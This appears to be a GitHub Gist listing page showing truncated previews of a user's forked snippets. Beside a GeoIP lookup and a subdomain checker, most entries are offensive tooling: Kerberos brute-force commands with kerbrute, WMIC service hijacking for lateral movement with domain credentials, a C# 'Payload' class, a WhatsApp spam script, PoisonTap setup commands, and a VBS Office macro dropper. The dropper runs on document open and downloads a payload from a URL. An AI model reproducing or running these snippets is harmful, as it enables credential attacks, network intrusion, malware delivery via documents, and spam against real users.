Skip to content

Instantly share code, notes, and snippets.

@reanimat0r
reanimat0r / geoip2lookup.bash
Created May 10, 2020 09:51 — forked from bmatthewshea/geoip2lookup.bash
BASH GeoIP Lookup script for use with new Maxmind MMDB database files
#!/bin/bash
#
# By: Brady Shea - 10FEB2020
#
# Usage (ip4 only):
# geoip2lookup IP_ADDRESS
#
# ** Install GeoIP Tool and Updater **
#
# sudo add-apt-repository ppa:maxmind/ppa
@reanimat0r
reanimat0r / AbirDomains.py
Created April 23, 2020 21:21 — forked from ChananelCode/AbirDomains.py
Small very light-weight Subdomains checker .
# This code was written by Chananel Gerstensang.Contact: chananelg@gmail.com,
# Linkedin: https://www.linkedin.com/in/chananel-gerstensang-21a31b157
# Github: https://github.com/ChananelCode
# Enjoy!
import requests
counter_Domains = 0
Domains_List = open("./DomainsList.txt", "r").read().split()
@reanimat0r
reanimat0r / kerberos_attacks_cheatsheet.md
Created April 8, 2020 21:24 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reanimat0r
reanimat0r / kerberos_attacks_cheatsheet.md
Created April 8, 2020 21:24 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reanimat0r
reanimat0r / wmicLateralMovement.txt
Created April 8, 2020 21:12 — forked from G0ldenGunSec/wmicLateralMovement.txt
WMIC Service Modification for Lateral Movement
As always, only for use on networks you own or have permission to test against.
Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely.
If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well.
The process involves a total of four commands, three of which can be combined on the command line to form one large block.
Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager)
wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@reanimat0r
reanimat0r / whatsapp_sendMSG.js
Created April 1, 2020 03:05 — forked from yask123/whatsapp_sendMSG.js
Send messages on whatsapp by Javascript
document.getElementsByClassName("input")[1].innerHTML="This message was written via JS script! "; // Fills the text box message
var input = document.getElementsByClassName("icon btn-icon icon-send");//Grabs the send button
input[0].click();// Clicks the send button
@reanimat0r
reanimat0r / whatsapp_sendMSG.js
Created April 1, 2020 02:59 — forked from igormuba/whatsapp_sendMSG.js
Spam messages to WhatsApp counting from 0
// Are you new to Javascript?
//Just copy, open firefox (did not work on Google Chrome for me)
//press f12, go console tab, paste, change according to instructions and press enter
//Thank you rafaelxavierborges for providing the message sending code
//I have just turned it into a spammer that counts from 0 and send the next number every second
var t=0; //what is the first number you want to send
var i=1; //delay in seconds
setInterval(function(){
window.InputEvent = window.Event || window.InputEvent;
var d = new Date();
@reanimat0r
reanimat0r / VBS macro dropper
Created January 30, 2020 19:17 — forked from y0no/VBS macro dropper
A simple dropper used with Office macro
Sub AutoOpen()
Auto_Open
End Sub
Sub Auto_Open()
payloadURL = "<Download URL>"
Dim req: Set req = CreateObject("Microsoft.XMLHTTP")
Dim payloadStream: Set payloadStream = CreateObject("Adodb.Stream")
req.Open "GET", payloadURL, False
req.Send
@reanimat0r
reanimat0r / Pi.txt
Created January 30, 2020 19:15 — forked from jgamblin/Pi.txt
PoisonTap Install Commands
##Server:
sudo apt-get update && apt-get upgrade
sudo apt-get install screen nodejs nodejs-legacy git npm
sudo npm install websocket
git clone https://github.com/samyk/poisontap
screen
sudo node backend_server.js
##piZero:
sudo apt-get update && apt-get upgrade